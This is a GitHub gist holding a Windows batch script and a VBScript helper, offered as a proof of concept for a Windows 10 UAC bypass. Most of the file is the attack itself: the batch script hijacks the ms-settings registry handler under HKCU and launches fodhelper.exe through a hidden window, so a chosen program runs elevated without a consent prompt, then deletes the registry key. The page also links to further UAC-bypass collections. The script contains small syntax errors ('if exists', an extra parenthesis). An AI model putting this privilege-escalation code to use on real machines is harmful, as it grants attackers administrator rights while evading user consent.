Last active
March 15, 2022 09:19
-
-
Save tnhung2011/fc1d23ccf7a23ab31d5886d36999ffa1 to your computer and use it in GitHub Desktop.
A Batch concept of a vulnerability in Windows 10 discovered by Cristian B. (Please note: This is a Proof of Concept and is not intended for illegal usage!)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
rem Other bindings: | |
rem - https://github.com/winscripting/UAC-bypass | |
rem - https://gist.github.com/tommelo/07dacce52664a35d2938a55d96bc8ac5 | |
set null= | |
set program=%* | |
if exists %program% ( | |
rem Create registry structure | |
reg add /f HKCU\Software\Classes\ms-settings\Shell\Open\command | |
reg add /f HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d %null% | |
reg add /f HKCU\Software\Classes\ms-settings\Shell\Open\command /v (Default) /t REG_SZ /d %program% | |
rem Perform the bypass | |
wscript.exe %~dp0\cmdhid.vbs %systemroot%\System32\fodhelper.exe | |
rem Remove registry structure | |
timeout 3 | |
reg delete /f HKCU\Software\Classes\ms-settings\ | |
) else ( | |
echo %~nx0: The specified path doesn't exist! | |
) | |
) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment